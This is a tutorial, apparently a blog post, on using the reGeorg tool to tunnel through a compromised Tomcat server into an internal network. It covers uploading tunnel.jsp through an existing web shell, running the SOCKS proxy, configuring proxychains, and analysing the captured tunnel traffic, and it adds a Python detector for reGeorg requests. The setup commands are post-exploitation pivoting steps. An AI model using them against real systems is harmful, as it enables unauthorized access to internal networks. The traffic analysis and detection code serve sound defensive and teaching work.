How to Use reGeorg for Efficient HTTP Tunneling and Proxy Access to Internal Networks

Introducing reGeorg

reGeorg's predecessor is reDuh, which SensePost released at BlackHat USA 2008.

reGeorg is reDuh's successor. It exposes the tunnel to the attacker as a SOCKS5 proxy, so any TCP client can be pointed at it, and it is considerably more efficient than reDuh.

The need for an HTTP tunnel arises when we can reach Server A from the internet but cannot talk to the hosts on the internal network behind it. Suppose we have obtained a web shell on Server A, and the internal hosts cannot reach the internet over ICMP, DNS, TCP or UDP at all; the only data channel into the environment is the HTTP connection to Server A's web application.

reGeorg therefore has two halves. A tunnel script (tunnel.jsp here; the repository also ships PHP and ASPX variants) is uploaded to the compromised, internet-facing Server A, and reGeorgSocksProxy.py runs on the attacker's machine, where it exposes a local SOCKS5 port. Every connection made through that SOCKS port is carried to Server A as ordinary HTTP requests, and Server A opens the real TCP connection to the internal host. Server A thus acts as a relay between the attacker and the internal network.

reGeorg download link:


git clone https://github.com/sensepost/reGeorg.git

Topology Using reGeorg


Environment: reGeorg

A VPS with IP 182.x.x.x plays the victim, Server A. A Docker container is deployed on it, and a Tomcat instance listens on port 8080, which is reachable from the internet. The internal target is the container network host 172.17.0.2, reachable only from Server A. A second VPS with IP 81.x.x.x plays the attacker and runs reGeorg to build the HTTP tunnel; a Kali machine is then pointed at that proxy.

Setup Process

1. Using the shell already obtained on the victim, upload tunnel.jsp into the web root of Server A's HTTP server, then test that it can be reached:


curl http://182.x.x.x:8080/tunnel.jsp

The server returns Georg says, ‘All seems fine’

Server-side configuration complete

2. On the attacker's VPS, fetch the reGeorg repository and run the SOCKS proxy script, listening on port 3333 and pointed at the uploaded tunnel.jsp. Note that -l 0.0.0.0 binds the listener on every interface and the reGeorg SOCKS server performs no authentication, so anyone who can reach 81.x.x.x:3333 can use the tunnel. That is what lets the separate Kali machine connect in the next step, but on a real engagement restrict the port with a firewall rule, or bind to 127.0.0.1 and reach it over an SSH port forward.


python reGeorgSocksProxy.py -l 0.0.0.0 -p 3333 -u http://x.x.x.x:8080/tunnel.jsp

3. On the Kali attacker machine, edit the proxychains configuration and add the reGeorg listener (the attacker VPS's IP and port 3333) as a SOCKS5 proxy.

vim /etc/proxychains.conf

Add a line at the end:

socks5 81.x.x.x 3333

Access the internal network server through the proxy on Kali.


proxychains curl http://172.17.0.2/login.php

The request succeeds, and the setup is complete.

Traffic Analysis

Kali

On Kali, start a capture with tcpdump, then access the internal host through the proxy and analyze the traffic.


tcpdump -i eth0 -w kali.pcap

Then open the capture in Wireshark and follow the TCP stream. Keep in mind which leg of the path this is: Kali talks SOCKS5 to the reGeorg listener on 81.x.x.x:3333, not HTTP to Server A, so the stream begins with the SOCKS5 negotiation (the non-printable bytes below; the 'P' is 0x50, the low byte of port 80 in the SOCKS CONNECT request and in its reply) and then carries curl's request and the internal host's response in the clear. Nothing on this leg is encrypted.


...............P.........P
GET /login.php HTTP/1.1
Host: 172.17.0.2
User-Agent: curl/7.68.0
Accept: */*

HTTP/1.1 200 OK
Date: Thu, 17 Dec 2020 16:39:09 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.25
Set-Cookie: PHPSESSID=7mhcg05sbeerpgjvthqad6r7t6; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=7mhcg05sbeerpgjvthqad6r7t6; path=/; httponly
Set-Cookie: security=impossible; httponly
Vary: Accept-Encoding
Content-Length: 1567
Content-Type: text/html;charset=utf-8

Server A

On Server A, the first stream shows that Server A is acting as the pivot: the request tells tunnel.jsp which internal host and port to connect to, both in the query string (cmd=connect&target=172.17.0.2&port=80) and in the X-CMD, X-TARGET and X-PORT headers. Tomcat answers with a JSESSIONID cookie, and that session is what ties the following read, forward and disconnect requests to this particular internal socket. X-STATUS: OK reports that the connection to 172.17.0.2:80 was opened successfully.

POST http://182.x.x.x:8080/tunnel.jsp?cmd=connect&target=172.17.0.2&port=80 HTTP/1.1
Host: 182.x.x.x:8080
Accept-Encoding: identity
Content-Length: 0
X-CMD: CONNECT
X-PORT: 80
X-TARGET: 172.17.0.2
User-Agent: python-urllib3/1.26.2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C71AAD9AFD48C0E4796514EF6835F2B4; Path=/; HttpOnly
X-STATUS: OK
Content-Type: text/html
Content-Length: 0
Date: Thu, 17 Dec 2020 16:44:45 GMT

The next stream, cmd=read, is the proxy polling for whatever the internal socket has returned so far; the response body is the raw bytes destined for the SOCKS client.

Accept-Encoding: identity in the request tells Server A that the client accepts only an unencoded response body. RFC 7231 treats identity as always acceptable unless it is explicitly excluded, so the server must not answer 406 Not Acceptable, and it also must not compress or otherwise transform the tunnelled bytes.

Transfer-Encoding: chunked in the response means the body is sent in length-prefixed chunks: the servlet writes whatever it has read from the internal socket without knowing the total size in advance, so Tomcat cannot set a Content-Length.

POST /tunnel.jsp?cmd=read HTTP/1.1
Host: 182.x.x.x:8080
Accept-Encoding: identity
Content-Length: 0
X-CMD: READ
Cookie: JSESSIONID=C71AAD9AFD48C0E4796514EF6835F2B4; Path=/; HttpOnly
Connection: Keep-Alive
User-Agent: python-urllib3/1.26.2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-STATUS: OK
Content-Type: text/html
Transfer-Encoding: chunked
Date: Thu, 17 Dec 2020 16:44:45 GMT

The following stream is cmd=forward: the bytes the SOCKS client sent (here curl's GET /login.php, 83 bytes, posted as application/octet-stream) are written by tunnel.jsp to the socket it holds for this session. The response carries no body; the internal host's reply comes back through a later read.

POST /tunnel.jsp?cmd=forward HTTP/1.1
Host: 182.x.x.x:8080
Accept-Encoding: identity
Content-Length: 83
Content-Type: application/octet-stream
X-CMD: FORWARD
Cookie: JSESSIONID=C71AAD9AFD48C0E4796514EF6835F2B4; Path=/; HttpOnly
Connection: Keep-Alive
User-Agent: python-urllib3/1.26.2

GET /login.php HTTP/1.1
Host: 172.17.0.2
User-Agent: curl/7.68.0
Accept: */*

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-STATUS: OK
Content-Type: text/html
Content-Length: 0
Date: Thu, 17 Dec 2020 16:44:45 GMT

Finally, cmd=disconnect closes the internal socket and ends the tunnel session.

POST /tunnel.jsp?cmd=disconnect HTTP/1.1
Host: 182.x.x.x:8080
Accept-Encoding: identity
X-CMD: DISCONNECT
Cookie: JSESSIONID=C71AAD9AFD48C0E4796514EF6835F2B4; Path=/; HttpOnly
User-Agent: python-urllib3/1.26.2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-STATUS: OK
Content-Type: text/html
Content-Length: 0
Date: Thu, 17 Dec 2020 16:44:45 GMT
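As an added example (not code from the original post or from the reGeorg project), the following Python script turns the observations above into a detection: it parses raw HTTP requests the way a reverse proxy, IDS or full-request log on Server A would see them, flags those that carry a reGeorg command in the X-CMD header or the cmd= query parameter, extracts the pivot target from the connect request, and groups the remaining commands by JSESSIONID. The sample requests are constructed to mirror the capture above and are not real data; the function names and the output layout are assumptions of this example.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# reGeorg names its command both as ?cmd=<name> in the query string and in the
# X-CMD header; CONNECT also carries the pivot target in X-TARGET / X-PORT
# (and as target= / port= query parameters).
REGEORG_CMDS = {"CONNECT", "READ", "FORWARD", "DISCONNECT"}
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+HTTP/1\.[01]$")


def parse_request(raw):
    """Split the head of one raw HTTP request into (method, target, headers).

    Only the request line and header block are read; a body (the tunnelled
    bytes on FORWARD) is left alone. Header names are lower-cased.
    Returns None when the first line is not an HTTP request line.
    """
    lines = raw.lstrip().splitlines()
    if not lines:
        return None
    m = REQUEST_LINE.match(lines[0].rstrip())
    if not m:
        return None
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # the empty line terminates the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return m.group("method"), m.group("target"), headers


def classify_request(raw):
    """Describe a reGeorg tunnel request as a dict, or return None if it is not one.

    A POST is flagged when its X-CMD header or cmd= query parameter names one of
    the four tunnel commands. The session id comes from the JSESSIONID cookie
    that the client sends back on every request after CONNECT.
    """
    parsed = parse_request(raw)
    if parsed is None:
        return None
    method, target, headers = parsed
    url = urlsplit(target)  # works for "/tunnel.jsp?..." and absolute-form URLs alike
    query = parse_qs(url.query)
    cmd = (headers.get("x-cmd") or query.get("cmd", [""])[0]).upper()
    if method != "POST" or cmd not in REGEORG_CMDS:
        return None
    sess = re.search(r"JSESSIONID=([0-9A-Za-z]+)", headers.get("cookie", ""))
    return {
        "cmd": cmd,
        "script": url.path,
        "session": sess.group(1) if sess else None,
        "target": headers.get("x-target") or query.get("target", [None])[0],
        "port": headers.get("x-port") or query.get("port", [None])[0],
        "user_agent": headers.get("user-agent", ""),
    }


def summarize(raw_requests):
    """Aggregate flagged requests into the facts an analyst wants first:
    the tunnel script, the internal hosts pivoted to, and per-session activity."""
    hits = [h for h in map(classify_request, raw_requests) if h]
    return {
        "flagged": len(hits),
        "endpoints": sorted({h["script"] for h in hits}),
        "pivots": sorted({(h["target"], h["port"]) for h in hits if h["cmd"] == "CONNECT"}),
        "commands": Counter(h["cmd"] for h in hits),
        "sessions": dict(Counter(h["session"] for h in hits if h["session"])),
    }


# Constructed sample requests mirroring the capture in the post (not real data):
# one ordinary browser request, then the four tunnel commands in order.
SID = "JSESSIONID=C71AAD9AFD48C0E4796514EF6835F2B4; Path=/; HttpOnly"
UA = "User-Agent: python-urllib3/1.26.2"
SAMPLE_REQUESTS = [
    "GET /index.jsp HTTP/1.1\r\nHost: 182.x.x.x:8080\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "POST http://182.x.x.x:8080/tunnel.jsp?cmd=connect&target=172.17.0.2&port=80 HTTP/1.1\r\n"
    "Host: 182.x.x.x:8080\r\nAccept-Encoding: identity\r\nContent-Length: 0\r\n"
    f"X-CMD: CONNECT\r\nX-PORT: 80\r\nX-TARGET: 172.17.0.2\r\n{UA}\r\n\r\n",
    f"POST /tunnel.jsp?cmd=read HTTP/1.1\r\nHost: 182.x.x.x:8080\r\nX-CMD: READ\r\n"
    f"Cookie: {SID}\r\n{UA}\r\n\r\n",
    f"POST /tunnel.jsp?cmd=forward HTTP/1.1\r\nHost: 182.x.x.x:8080\r\nContent-Length: 83\r\n"
    f"Content-Type: application/octet-stream\r\nX-CMD: FORWARD\r\nCookie: {SID}\r\n{UA}\r\n\r\n"
    "GET /login.php HTTP/1.1\r\nHost: 172.17.0.2\r\nUser-Agent: curl/7.68.0\r\nAccept: */*\r\n\r\n",
    f"POST /tunnel.jsp?cmd=disconnect HTTP/1.1\r\nHost: 182.x.x.x:8080\r\nX-CMD: DISCONNECT\r\n"
    f"Cookie: {SID}\r\n{UA}\r\n\r\n",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(classify_request(req))
    print(summarize(SAMPLE_REQUESTS))
```

Run it directly to print the per-request classification and the summary. In practice, feed it requests reassembled from a pcap or from a proxy that logs full headers; most default access-log formats record only the request line, so the cmd= query parameter would still be visible there, but the X-CMD/X-TARGET/X-PORT headers would not.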

Internal Network Server

On the internal host, the capture shows the request for login.php arriving from Server A. The request line, the Host header and curl's User-Agent are exactly what Kali sent; from the internal host's point of view this is an ordinary HTTP request originating at Server A, with nothing to indicate that a tunnel is involved.

GET /login.php HTTP/1.1
Host: 172.17.0.2
User-Agent: curl/7.68.0
Accept: */*

HTTP/1.1 200 OK
Date: Thu, 17 Dec 2020 16:53:17 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.25
Set-Cookie: PHPSESSID=65ehap87lgj2sk84poopt0aep3; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=65ehap87lgj2sk84poopt0aep3; path=/; httponly
Set-Cookie: security=impossible; httponly
Vary: Accept-Encoding
Content-Length: 1567
Content-Type: text/html;charset=utf-8

Summary

Tracing the traffic through the whole tunnel shows the sequence: the proxy first asks tunnel.jsp to connect to a specified internal IP and port, then repeatedly reads from that socket (with Accept-Encoding: identity on the request and a chunked body on the response), forwards the client's bytes to it, and finally closes it with disconnect. From a defender's perspective everything in this exchange is visible in Server A's HTTP traffic: a series of POSTs to one script with cmd= parameters and X-CMD/X-TARGET/X-PORT headers, a python-urllib3 User-Agent, and a Cookie header that echoes the Set-Cookie attributes (Path=/; HttpOnly) verbatim, which no browser does. On the attacker's side, the leg from Kali to the reGeorg listener is plain SOCKS5 carrying cleartext, so that listener should be reachable only by the operator.